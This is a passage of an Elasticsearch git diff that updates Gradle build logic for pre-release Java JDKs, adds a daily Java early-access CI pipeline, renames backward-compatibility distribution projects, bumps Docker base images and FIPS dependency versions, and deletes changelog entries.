groovy.xml.XmlParser; +import groovy.xml.XmlNodePrinter; import java.nio.file.Files import static java.nio.file.StandardCopyOption.REPLACE_EXISTING @@ -35,11 +37,11 @@ buildscript { 
plugins { id 'lifecycle-base' id 'elasticsearch.docker-support' + id 'elasticsearch.internal-distribution-download' + id 'elasticsearch.jdk-download' id 'elasticsearch.global-build-info' id 'elasticsearch.build-complete' id 'elasticsearch.build-scan' - id 'elasticsearch.jdk-download' - id 'elasticsearch.internal-distribution-download' id 'elasticsearch.runtime-jdk-provision' id 'elasticsearch.ide' id 'elasticsearch.forbidden-dependencies' @@ -194,6 +196,21 @@ tasks.register("updateCIBwcVersions") { ] ) + writeBuildkitePipeline( + ".buildkite/pipelines/periodic-java-ea.yml", + ".buildkite/pipelines/periodic-java-ea.template.yml", + [ + new ListExpansion(versions: filterIntermediatePatches(buildParams.bwcVersions.unreleasedIndexCompatible), variable: "BWC_LIST"), + ], + [ + new StepExpansion( + templatePath: ".buildkite/pipelines/periodic-java-ea.bwc.template.yml", + versions: filterIntermediatePatches(buildParams.bwcVersions.indexCompatible), + variable: "BWC_STEPS" + ), + ] + ) + expandBwcSteps( ".buildkite/pipelines/periodic-packaging.yml", ".buildkite/pipelines/periodic-packaging.template.yml", @@ -325,12 +342,14 @@ allprojects { resolveJavaToolChain = true // ensure we have best possible caching of bwc builds - dependsOn ":distribution:bwc:bugfix:buildBwcLinuxTar" - dependsOn ":distribution:bwc:bugfix2:buildBwcLinuxTar" - dependsOn ":distribution:bwc:bugfix3:buildBwcLinuxTar" - dependsOn ":distribution:bwc:minor:buildBwcLinuxTar" - dependsOn ":distribution:bwc:staged:buildBwcLinuxTar" - dependsOn ":distribution:bwc:staged2:buildBwcLinuxTar" + dependsOn ":distribution:bwc:major1:buildBwcLinuxTar" + dependsOn ":distribution:bwc:major2:buildBwcLinuxTar" + dependsOn ":distribution:bwc:major3:buildBwcLinuxTar" + dependsOn ":distribution:bwc:major4:buildBwcLinuxTar" + dependsOn ":distribution:bwc:minor1:buildBwcLinuxTar" + dependsOn ":distribution:bwc:minor2:buildBwcLinuxTar" + dependsOn ":distribution:bwc:minor3:buildBwcLinuxTar" + dependsOn ":distribution:bwc:minor4:buildBwcLinuxTar" } if (project.path.contains("fixture")) { dependsOn tasks.withType(ComposePull) @@ -366,7 +385,7 @@ allprojects { } } } - + proj.tasks.register("bcUpgradeTest$partString") { dependsOn tasks.matching { it.name == 'bcUpgradeTest' } withReleaseBuild { diff --git a/catalog-info.yaml b/catalog-info.yaml index 0768e1670666f..91b0f692d46b3 100644 --- a/catalog-info.yaml +++ b/catalog-info.yaml @@ -99,6 +99,46 @@ spec: publish_commit_status: false trigger_mode: none --- +# yaml-language-server: $schema=https://gist.githubusercontent.com/elasticmachine/988b80dae436cafea07d9a4a460a011d/raw/e57ee3bed7a6f73077a3f55a38e76e40ec87a7cf/rre.schema.json +apiVersion: backstage.io/v1alpha1 +kind: Resource +metadata: + name: buildkite-pipeline-elasticsearch-periodic-java-ea + description: Elasticsearch tests and checks that are run against the latest Java EA builds + links: + - title: Pipeline + url: https://buildkite.com/elastic/elasticsearch-periodic-java-ea +spec: + type: buildkite-pipeline + system: buildkite + owner: group:elasticsearch-team + implementation: + apiVersion: buildkite.elastic.dev/v1 + kind: Pipeline + metadata: + description: ":elasticsearch: Tests and checks that are run daily against the latest Java EA builds" + name: elasticsearch / periodic / java-ea + spec: + repository: elastic/elasticsearch + pipeline_file: .buildkite/pipelines/periodic-java-ea.yml + branch_configuration: main + teams: + elasticsearch-team: {} + ml-core: {} + everyone: + access_level: BUILD_AND_READ + provider_settings: + build_branches: 
false + build_pull_requests: false + publish_commit_status: false + trigger_mode: none + schedules: + Periodically on main: + branch: main + cronline: "0 4 * * * America/New_York" + message: "Run Java EA tests once per day" +--- + # yaml-language-server: $schema=https://gist.githubusercontent.com/elasticmachine/988b80dae436cafea07d9a4a460a011d/raw/e57ee3bed7a6f73077a3f55a38e76e40ec87a7cf/rre.schema.json apiVersion: backstage.io/v1alpha1 kind: Resource diff --git a/distribution/build.gradle b/distribution/build.gradle index fa6223d30e63b..e13449f4036bf 100644 --- a/distribution/build.gradle +++ b/distribution/build.gradle @@ -20,6 +20,8 @@ import org.elasticsearch.gradle.transform.FilteringJarTransform import java.nio.file.Files import java.nio.file.Path +import static org.elasticsearch.gradle.internal.toolchain.EarlyAccessCatalogJdkToolchainResolver.findLatestPreReleaseBuildNumber + plugins { id 'base' id 'elasticsearch.distro' @@ -48,9 +50,9 @@ dependencies { def thisProj = project rootProject.allprojects { proj -> - proj.plugins.withType(DependenciesInfoPlugin) { - thisProj.dependencies.add("dependencyInfos", project.dependencies.project(path: proj.path)) - } + proj.plugins.withType(DependenciesInfoPlugin) { + thisProj.dependencies.add("dependencyInfos", project.dependencies.project(path: proj.path)) + } } /***************************************************************************** @@ -61,9 +63,10 @@ rootProject.allprojects { proj -> tasks.register("generateDependenciesReport", ConcatFilesTask) { files = configurations.dependencyInfos headerLine = "name,version,url,license,sourceURL" - target = new File(providers.systemProperty('csv') - .orElse("${project.buildDir}/reports/dependencies/es-dependencies.csv") - .get() + target = new File( + providers.systemProperty('csv') + .orElse("${project.buildDir}/reports/dependencies/es-dependencies.csv") + .get() ) // explicitly add our dependency on the JDK String jdkVersion = VersionProperties.versions.get('bundled_jdk').split('@')[0] @@ -246,20 +249,46 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { apply plugin: 'elasticsearch.jdk-download' apply plugin: 'elasticsearch.repositories' - // Setup all required JDKs - project.jdks { - ['darwin', 'windows', 'linux'].each { platform -> - (platform == 'linux' || platform == 'darwin' ? ['x64', 'aarch64'] : ['x64']).each { architecture -> - "bundled_${platform}_${architecture}" { - it.platform = platform - it.version = VersionProperties.bundledJdkVersion - it.vendor = VersionProperties.bundledJdkVendor - it.architecture = architecture + if (buildParams.runtimeJava.preRelease) { + Integer buildNumber = Integer.getInteger("runtime.java.build") + String preReleaseType = buildParams.runtimeJava.preReleaseType + def runtimeJavaMajorVersion = Integer.parseInt(buildParams.runtimeJavaVersion.get().getMajorVersion()) + if (buildNumber == null) { + buildNumber = findLatestPreReleaseBuildNumber(runtimeJavaMajorVersion, preReleaseType); + } + String preReleaseVersionString = String.format("%d-%s+%d", runtimeJavaMajorVersion, preReleaseType, buildNumber); + + project.jdks { + ['darwin', 'windows', 'linux'].each { platform -> + (platform == 'linux' || platform == 'darwin' ?
['x64', 'aarch64'] : ['x64']).each { architecture -> + "bundled_${platform}_${architecture}" { + it.version = preReleaseVersionString; + it.vendor = "openjdk" + it.platform = platform + it.architecture = architecture + it.distributionVersion = preReleaseType + } + } + } + } + } else { + // Setup all required JDKs + project.jdks { + ['darwin', 'windows', 'linux'].each { platform -> + (platform == 'linux' || platform == 'darwin' ? ['x64', 'aarch64'] : ['x64']).each { architecture -> + "bundled_${platform}_${architecture}" { + it.platform = platform + it.version = VersionProperties.bundledJdkVersion + it.vendor = VersionProperties.bundledJdkVendor + it.architecture = architecture + } } } } + } + // TODO: the map needs to be an input of the tasks, so that when it changes, the task will re-run... /***************************************************************************** * Properties to expand when copying packaging files * @@ -288,7 +317,8 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { } all { resolutionStrategy.dependencySubstitution { - substitute module("org.apache.logging.log4j:log4j-core") using project(":libs:log4j") because "patched to remove JndiLookup class"} + substitute module("org.apache.logging.log4j:log4j-core") using project(":libs:log4j") because "patched to remove JndiLookup class" + } } } @@ -354,7 +384,7 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { into('platform') { from(configurations.libsNative) if (os != null) { - include (os + '-' + architecture + '/*') + include(os + '-' + architecture + '/*') } } into('entitlement-agent') { @@ -416,7 +446,7 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { // main config files, processed with distribution specific substitutions from '../src/config' exclude 'log4j2.properties' // this is handled separately below - filter("tokens" : expansionsForDistribution(distributionType, isTestDistro), ReplaceTokens.class) + filter("tokens": expansionsForDistribution(distributionType, isTestDistro), ReplaceTokens.class) } from buildDefaultLog4jConfigTaskProvider from isTestDistro ? 
integTestConfigFiles : defaultConfigFiles @@ -431,11 +461,11 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { exclude '*.exe' exclude '*.bat' eachFile { - it.permissions{ + it.permissions { unix(0755) } } - filter("tokens" : expansionsForDistribution(distributionType, testDistro), ReplaceTokens.class) + filter("tokens": expansionsForDistribution(distributionType, testDistro), ReplaceTokens.class) } // windows files, only for zip if (distributionType == 'zip') { @@ -443,7 +473,7 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { from '../src/bin' include '*.bat' filter(FixCrLfFilter, eol: FixCrLfFilter.CrLf.newInstance('crlf')) - filter("tokens" : expansionsForDistribution(distributionType, testDistro), ReplaceTokens.class) + filter("tokens": expansionsForDistribution(distributionType, testDistro), ReplaceTokens.class) } with copySpec { from '../src/bin' @@ -466,7 +496,7 @@ configure(subprojects.findAll { ['archives', 'packages'].contains(it.name) }) { if (testDistro) { from buildServerNoticeTaskProvider } else { - from (buildDefaultNoticeTaskProvider) { + from(buildDefaultNoticeTaskProvider) { filePermissions { unix(0644) } @@ -547,57 +577,57 @@ subprojects { String footer = "# Built for ${project.name}-${project.version} " + "(${distributionType})" Map expansions = [ - 'project.name': project.name, - 'project.version': version, + 'project.name' : project.name, + 'project.version' : version, 'project.minor.version': "${VersionProperties.elasticsearchVersion.major}.${VersionProperties.elasticsearchVersion.minor}", - 'path.conf': [ + 'path.conf' : [ 'deb': '/etc/elasticsearch', 'rpm': '/etc/elasticsearch', 'def': '"$ES_HOME"/config' ], - 'path.data': [ + 'path.data' : [ 'deb': packagingPathData, 'rpm': packagingPathData, 'def': '#path.data: /path/to/data' ], - 'path.env': [ + 'path.env' : [ 'deb': '/etc/default/elasticsearch', 'rpm': '/etc/sysconfig/elasticsearch', /* There isn't one of these files for tar or zip but its important to make an empty string here so the script can properly skip it. */ 'def': 'if [ -z "$ES_PATH_CONF" ]; then ES_PATH_CONF="$ES_HOME"/config; done', ], - 'source.path.env': [ + 'source.path.env' : [ 'deb': 'source /etc/default/elasticsearch', 'rpm': 'source /etc/sysconfig/elasticsearch', 'def': 'if [ -z "$ES_PATH_CONF" ]; then ES_PATH_CONF="$ES_HOME"/config; fi', ], - 'path.logs': [ + 'path.logs' : [ 'deb': packagingPathLogs, 'rpm': packagingPathLogs, 'def': '#path.logs: /path/to/logs' ], - 'scripts.footer': [ + 'scripts.footer' : [ /* Debian needs exit 0 on these scripts so we add it here and preserve the pretty footer. 
*/ 'deb': "exit 0\n${footer}", 'def': footer ], - 'es.distribution.type': [ + 'es.distribution.type' : [ 'deb': 'deb', 'rpm': 'rpm', 'tar': 'tar', 'zip': 'zip' ], - 'license.name': [ + 'license.name' : [ 'deb': 'Elastic-License' ], - 'license.text': [ + 'license.text' : [ 'deb': licenseText, ], ] @@ -629,22 +659,6 @@ subprojects { } } -['archives:windows-zip', - 'archives:darwin-tar', - 'archives:darwin-aarch64-tar', - 'archives:linux-aarch64-tar', - 'archives:linux-tar', - 'archives:integ-test-zip', - 'packages:rpm', 'packages:deb', - 'packages:aarch64-rpm', 'packages:aarch64-deb', -].forEach { subName -> - Project subproject = project("${project.path}:${subName}") - Configuration configuration = configurations.create(subproject.name) - dependencies { - "${configuration.name}" project(path: subproject.path, configuration:'default') - } -} - // This artifact makes it possible for other projects to pull // in the final log4j2.properties configuration, as it appears in the // archive distribution. diff --git a/distribution/bwc/bugfix3/build.gradle b/distribution/bwc/major1/build.gradle similarity index 100% rename from distribution/bwc/bugfix3/build.gradle rename to distribution/bwc/major1/build.gradle diff --git a/distribution/bwc/maintenance/build.gradle b/distribution/bwc/major2/build.gradle similarity index 100% rename from distribution/bwc/maintenance/build.gradle rename to distribution/bwc/major2/build.gradle diff --git a/distribution/bwc/minor/build.gradle b/distribution/bwc/major3/build.gradle similarity index 100% rename from distribution/bwc/minor/build.gradle rename to distribution/bwc/major3/build.gradle diff --git a/distribution/bwc/staged/build.gradle b/distribution/bwc/major4/build.gradle similarity index 100% rename from distribution/bwc/staged/build.gradle rename to distribution/bwc/major4/build.gradle diff --git a/distribution/bwc/staged2/build.gradle b/distribution/bwc/minor1/build.gradle similarity index 100% rename from distribution/bwc/staged2/build.gradle rename to distribution/bwc/minor1/build.gradle diff --git a/x-pack/plugin/async-search/qa/build.gradle b/distribution/bwc/minor2/build.gradle similarity index 100% rename from x-pack/plugin/async-search/qa/build.gradle rename to distribution/bwc/minor2/build.gradle diff --git a/x-pack/plugin/autoscaling/qa/build.gradle b/distribution/bwc/minor3/build.gradle similarity index 100% rename from x-pack/plugin/autoscaling/qa/build.gradle rename to distribution/bwc/minor3/build.gradle diff --git a/x-pack/plugin/enrich/qa/build.gradle b/distribution/bwc/minor4/build.gradle similarity index 100% rename from x-pack/plugin/enrich/qa/build.gradle rename to distribution/bwc/minor4/build.gradle diff --git a/distribution/docker/build.gradle b/distribution/docker/build.gradle index e3f87117ea029..55c859c679d74 100644 --- a/distribution/docker/build.gradle +++ b/distribution/docker/build.gradle @@ -129,7 +129,7 @@ dependencies { metricbeat_fips_aarch64 "beats:metricbeat-fips:${VersionProperties.elasticsearch}:linux-arm64@tar.gz" metricbeat_fips_x86_64 "beats:metricbeat-fips:${VersionProperties.elasticsearch}:linux-x86_64@tar.gz" - fips "org.bouncycastle:bc-fips:1.0.2.5" + fips "org.bouncycastle:bc-fips:1.0.2.6" fips "org.bouncycastle:bctls-fips:1.0.19" } @@ -659,7 +659,7 @@ subprojects { Project subProject -> it.setCompression(Compression.GZIP) it.getArchiveBaseName().set("elasticsearch${base.suffix}-${VersionProperties.elasticsearch}-docker-image") it.getArchiveVersion().set("") - it.getArchiveClassifier().set(architecture == 
Architecture.AARCH64 ? 'aarch64' : '') + it.getArchiveClassifier().set(architecture.dockerClassifier) it.getDestinationDirectory().set(new File(project.parent.buildDir, 'distributions')) it.dependsOn(exportTask) } @@ -668,6 +668,11 @@ subprojects { Project subProject -> dependsOn compressExportTask } + tasks.named('assemble').configure { + dependsOn exportTask + } + + // deprecated here for backwards compatibility of DistroTestPlugin and DistributionDownloadPlugin artifacts.add('default', file(tarFile)) { type = 'tar' name = artifactName diff --git a/distribution/docker/src/docker/dockerfiles/cloud_ess_fips/Dockerfile b/distribution/docker/src/docker/dockerfiles/cloud_ess_fips/Dockerfile index 75acc7f59c7a5..86cf8ca198f8b 100644 --- a/distribution/docker/src/docker/dockerfiles/cloud_ess_fips/Dockerfile +++ b/distribution/docker/src/docker/dockerfiles/cloud_ess_fips/Dockerfile @@ -1,5 +1,6 @@ ################################################################################ -# This Dockerfile was generated from the template at distribution/src/docker/Dockerfile +# This Dockerfile was generated from the template at +# distribution/src/docker/dockerfiles/cloud_ess_fips/Dockerfile # # Beginning of multi stage Dockerfile ################################################################################ @@ -24,7 +25,7 @@ # Extract Elasticsearch artifact ################################################################################ -FROM docker.elastic.co/wolfi/chainguard-base-fips:latest@sha256:68e0781cd592beda39880428985d5fecca1cf2abb18365da73bf1f7ebd994974 AS builder +FROM docker.elastic.co/wolfi/chainguard-base-fips:latest@sha256:e5602c71dfc1c1d9009f7368615e8a25480aa1c2c6e61ef7c00ce130a40def17 AS builder # Install required packages to extract the Elasticsearch distribution RUN <%= retry.loop(package_manager, "export DEBIAN_FRONTEND=noninteractive && ${package_manager} update && ${package_manager} update && ${package_manager} add --no-cache curl") %> @@ -103,14 +104,14 @@ WORKDIR /usr/share/elasticsearch/config # Add entrypoint ################################################################################ -FROM docker.elastic.co/wolfi/chainguard-base-fips:latest@sha256:68e0781cd592beda39880428985d5fecca1cf2abb18365da73bf1f7ebd994974 +FROM docker.elastic.co/wolfi/chainguard-base-fips:latest@sha256:e5602c71dfc1c1d9009f7368615e8a25480aa1c2c6e61ef7c00ce130a40def17 RUN <%= retry.loop(package_manager, "export DEBIAN_FRONTEND=noninteractive && \n" + " ${package_manager} update && \n" + " ${package_manager} upgrade && \n" + " ${package_manager} add --no-cache \n" + - " bash java-cacerts curl libstdc++ libsystemd netcat-openbsd p11-kit p11-kit-trust posix-libc-utils shadow tini unzip zip zstd && \n" + + " bash java-cacerts curl libstdc++ libsystemd netcat-openbsd p11-kit p11-kit-trust posix-libc-utils shadow tini unzip zip zstd wget && \n" + " rm -rf /var/cache/apk/* " ) %> @@ -162,7 +163,7 @@ RUN printf "\\n" | jdk/bin/keytool -importkeystore \ -deststorepass passwordcacert \ -deststoretype BCFKS \ -providerclass org.bouncycastle.jcajce.provider.BouncyCastleFipsProvider \ - -providerpath lib/bc-fips-1.0.2.5.jar \ + -providerpath lib/bc-fips-1.0.2.6.jar \ -destprovidername BCFIPS diff --git a/distribution/docker/src/docker/dockerfiles/wolfi/Dockerfile b/distribution/docker/src/docker/dockerfiles/wolfi/Dockerfile index edb6fd2b3e265..0134d9f035a1f 100644 --- a/distribution/docker/src/docker/dockerfiles/wolfi/Dockerfile +++ b/distribution/docker/src/docker/dockerfiles/wolfi/Dockerfile @@ -1,5 +1,6 @@ 
################################################################################ -# This Dockerfile was generated from the template at distribution/src/docker/Dockerfile +# This Dockerfile was generated from the template at +# distribution/src/docker/dockerfiles/wolfi/Dockerfile # # Beginning of multi stage Dockerfile ################################################################################ @@ -24,7 +25,7 @@ # Extract Elasticsearch artifact ################################################################################ -FROM docker.elastic.co/wolfi/chainguard-base:latest@sha256:3d19648819612728a676ab4061edfb3283bd7117a22c6c4479ee1c1d51831832 AS builder +FROM docker.elastic.co/wolfi/chainguard-base:latest@sha256:bb3bb9491f564296956a879033da287961829c431fc8dc68222c2b60f9bfa052 AS builder # Install required packages to extract the Elasticsearch distribution RUN <%= retry.loop(package_manager, "export DEBIAN_FRONTEND=noninteractive && ${package_manager} update && ${package_manager} update && ${package_manager} add --no-cache curl") %> @@ -79,7 +80,7 @@ RUN sed -i -e 's/ES_DISTRIBUTION_TYPE=tar/ES_DISTRIBUTION_TYPE=docker/' bin/elas # Add entrypoint ################################################################################ -FROM docker.elastic.co/wolfi/chainguard-base:latest@sha256:3d19648819612728a676ab4061edfb3283bd7117a22c6c4479ee1c1d51831832 +FROM docker.elastic.co/wolfi/chainguard-base:latest@sha256:bb3bb9491f564296956a879033da287961829c431fc8dc68222c2b60f9bfa052 RUN <%= retry.loop(package_manager, "export DEBIAN_FRONTEND=noninteractive && \n" + diff --git a/distribution/docker/src/docker/iron_bank/hardening_manifest.yaml b/distribution/docker/src/docker/iron_bank/hardening_manifest.yaml index 0a2d3ff921675..4a78658aa06d9 100644 --- a/distribution/docker/src/docker/iron_bank/hardening_manifest.yaml +++ b/distribution/docker/src/docker/iron_bank/hardening_manifest.yaml @@ -11,7 +11,7 @@ tags: # Build args passed to Dockerfile ARGs args: BASE_IMAGE: "redhat/ubi/ubi9" - BASE_TAG: "9.5" + BASE_TAG: "9.6" # Docker image labels labels: org.opencontainers.image.title: "elasticsearch" diff --git a/distribution/packages/build.gradle b/distribution/packages/build.gradle index 9129c9a12fc9e..570bccc394a52 100644 --- a/distribution/packages/build.gradle +++ b/distribution/packages/build.gradle @@ -400,6 +400,11 @@ subprojects { String buildTask = "build${it.name.replaceAll(/-[a-z]/) { it.substring(1).toUpperCase() }.capitalize()}" ext.buildDist = parent.tasks.named(buildTask) + tasks.named('assemble').configure { + dependsOn buildDist + } + + // deprecated here for backwards compatibility of DistroTestPlugin and DistributionDownloadPlugin artifacts { 'default' buildDist } diff --git a/distribution/tools/plugin-cli/build.gradle b/distribution/tools/plugin-cli/build.gradle index becdfbdb4d5e5..d3f8a2e2aa0c8 100644 --- a/distribution/tools/plugin-cli/build.gradle +++ b/distribution/tools/plugin-cli/build.gradle @@ -26,11 +26,11 @@ dependencies { implementation project(":libs:plugin-scanner") implementation project(":libs:entitlement") // TODO: asm is picked up from the plugin scanner and entitlements, we should consolidate so it is not defined twice - implementation 'org.ow2.asm:asm:9.7.1' - implementation 'org.ow2.asm:asm-tree:9.7.1' + implementation 'org.ow2.asm:asm:9.8' + implementation 'org.ow2.asm:asm-tree:9.8' api "org.bouncycastle:bcpg-fips:1.0.7.1" - api "org.bouncycastle:bc-fips:1.0.2.5" + api "org.bouncycastle:bc-fips:1.0.2.6" testImplementation project(":test:framework") 
testImplementation "com.google.jimfs:jimfs:${versions.jimfs}" testRuntimeOnly "com.google.guava:guava:${versions.jimfs_guava}" diff --git a/docs/changelog/106953.yaml b/docs/changelog/106953.yaml deleted file mode 100644 index 6993b1960a401..0000000000000 --- a/docs/changelog/106953.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 106953 -summary: Optimize usage calculation in ILM policies retrieval API -area: ILM+SLM -type: enhancement -issues: - - 105773 diff --git a/docs/changelog/113757.yaml b/docs/changelog/113757.yaml deleted file mode 100644 index 30e173d80b2a7..0000000000000 --- a/docs/changelog/113757.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 113757 -summary: Store arrays offsets for keyword fields natively with synthetic source instead of falling back to ignored source. -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/117642.yaml b/docs/changelog/117642.yaml deleted file mode 100644 index dbddbbf5e64eb..0000000000000 --- a/docs/changelog/117642.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 117642 -summary: Adding endpoint creation validation to `ElasticInferenceService` -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/119546.yaml b/docs/changelog/119546.yaml deleted file mode 100644 index 017bbb845c0a6..0000000000000 --- a/docs/changelog/119546.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 119546 -summary: Introduce `FallbackSyntheticSourceBlockLoader` and apply it to keyword fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/119967.yaml b/docs/changelog/119967.yaml deleted file mode 100644 index be5543be20238..0000000000000 --- a/docs/changelog/119967.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 119967 -summary: Add `index_options` to `semantic_text` field mappings -area: Mapping -type: enhancement -issues: [ ] diff --git a/docs/changelog/119995.yaml b/docs/changelog/119995.yaml deleted file mode 100644 index e9ee8bc5b8458..0000000000000 --- a/docs/changelog/119995.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 119995 -summary: "apm-data: Use representative count as event.success_count if available" -area: Ingest Node -type: bug -issues: [] diff --git a/docs/changelog/120302.yaml b/docs/changelog/120302.yaml deleted file mode 100644 index 29202b4858f80..0000000000000 --- a/docs/changelog/120302.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 120302 -summary: "ESQL: Enhanced `DATE_TRUNC` with arbitrary intervals" -area: ES|QL -type: enhancement -issues: - - 120094 diff --git a/docs/changelog/120363.yaml b/docs/changelog/120363.yaml deleted file mode 100644 index 65e74024bbbbb..0000000000000 --- a/docs/changelog/120363.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120363 -summary: Add thread pool utilization metric -area: "Infra/Metrics" -type: enhancement -issues: [] diff --git a/docs/changelog/120488.yaml b/docs/changelog/120488.yaml deleted file mode 100644 index 8d5b07ad21634..0000000000000 --- a/docs/changelog/120488.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120488 -summary: Publish queue latency metrics from tracked thread pools -area: "Infra/Metrics" -type: enhancement -issues: [] diff --git a/docs/changelog/120751.yaml b/docs/changelog/120751.yaml deleted file mode 100644 index 0c1dffc0e527b..0000000000000 --- a/docs/changelog/120751.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120751 -summary: Adding support for binary embedding type to Cohere service embedding type -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/120774.yaml b/docs/changelog/120774.yaml deleted file mode 100644 index 
8157e1725be83..0000000000000 --- a/docs/changelog/120774.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120774 -summary: Retry ES|QL node requests on shard level failures -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/120957.yaml b/docs/changelog/120957.yaml deleted file mode 100644 index 841ef945ce7ef..0000000000000 --- a/docs/changelog/120957.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120957 -summary: Introduce `AllocationBalancingRoundSummaryService` -area: Allocation -type: enhancement -issues: [] diff --git a/docs/changelog/120998.yaml b/docs/changelog/120998.yaml deleted file mode 100644 index 4d9a3aa3eb1c4..0000000000000 --- a/docs/changelog/120998.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120998 -summary: ES|QL `change_point` processing command -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/121041.yaml b/docs/changelog/121041.yaml deleted file mode 100644 index 44a51a966c0a1..0000000000000 --- a/docs/changelog/121041.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121041 -summary: Support configurable chunking in `semantic_text` fields -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/121106.yaml b/docs/changelog/121106.yaml deleted file mode 100644 index d98c0938c2a7f..0000000000000 --- a/docs/changelog/121106.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121106 -summary: Add `ModelRegistryMetadata` to Cluster State -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/121240.yaml b/docs/changelog/121240.yaml deleted file mode 100644 index b0ca8e5e614db..0000000000000 --- a/docs/changelog/121240.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121240 -summary: Implement runtime skip_unavailable=true -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/121256.yaml b/docs/changelog/121256.yaml deleted file mode 100644 index b4ba7fb3d0149..0000000000000 --- a/docs/changelog/121256.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121256 -summary: Run `TransportEnrichStatsAction` on local node -area: Ingest Node -type: enhancement -issues: [] diff --git a/docs/changelog/121260.yaml b/docs/changelog/121260.yaml deleted file mode 100644 index 40c7487f29b12..0000000000000 --- a/docs/changelog/121260.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121260 -summary: Introduce a pre-mapping logical plan processing step -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/121324.yaml b/docs/changelog/121324.yaml deleted file mode 100644 index d105ea0b46b4c..0000000000000 --- a/docs/changelog/121324.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 121324 -summary: Support duplicate suggestions in completion field -area: Suggesters -type: bug -issues: - - 82432 diff --git a/docs/changelog/121327.yaml b/docs/changelog/121327.yaml deleted file mode 100644 index fc684ea504f3d..0000000000000 --- a/docs/changelog/121327.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121327 -summary: Reduce Data Loss in System Indices Migration -area: Infra/Core -type: bug -issues: [] diff --git a/docs/changelog/121370.yaml b/docs/changelog/121370.yaml deleted file mode 100644 index cfa67bf5b2644..0000000000000 --- a/docs/changelog/121370.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121370 -summary: Improve SLM Health Indicator to cover missing snapshot -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/121548.yaml b/docs/changelog/121548.yaml deleted file mode 100644 index 889a3e81c3f8c..0000000000000 --- a/docs/changelog/121548.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121548 -summary: Adding support for specifying 
embedding type to Jina AI service settings -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/121784.yaml b/docs/changelog/121784.yaml deleted file mode 100644 index c336205767803..0000000000000 --- a/docs/changelog/121784.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121784 -summary: Optionally allow text similarity reranking to fail -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/121805.yaml b/docs/changelog/121805.yaml deleted file mode 100644 index 7d0f3a96221ae..0000000000000 --- a/docs/changelog/121805.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121805 -summary: Support subset of metrics in aggregate metric double -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/121827.yaml b/docs/changelog/121827.yaml deleted file mode 100644 index 11c9c201655a7..0000000000000 --- a/docs/changelog/121827.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 121827 -summary: Updates to allow using Cohere binary embedding response in semantic search - queries -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/121885.yaml b/docs/changelog/121885.yaml deleted file mode 100644 index 252d0cef2cec1..0000000000000 --- a/docs/changelog/121885.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121885 -summary: Introduce batched query execution and data-node side reduce -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/121920.yaml b/docs/changelog/121920.yaml deleted file mode 100644 index 6f0f4462d52ae..0000000000000 --- a/docs/changelog/121920.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 121920 -summary: Account for the `SearchHit` source in circuit breaker -area: Search -type: enhancement -issues: - - 89656 diff --git a/docs/changelog/121942.yaml b/docs/changelog/121942.yaml deleted file mode 100644 index 4973ebbb4f26c..0000000000000 --- a/docs/changelog/121942.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121942 -summary: Allow partial results in ES|QL -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/121948.yaml b/docs/changelog/121948.yaml deleted file mode 100644 index bfa87dbe51955..0000000000000 --- a/docs/changelog/121948.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121948 -summary: Add initial grammar and changes for FORK -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/122062.yaml b/docs/changelog/122062.yaml deleted file mode 100644 index 12567bb60217e..0000000000000 --- a/docs/changelog/122062.yaml +++ /dev/null @@ -1,54 +0,0 @@ -pr: 122062 -summary: Upgrade `discovery-ec2` to AWS SDK v2 -area: Discovery-Plugins -type: breaking -issues: [] -breaking: - title: 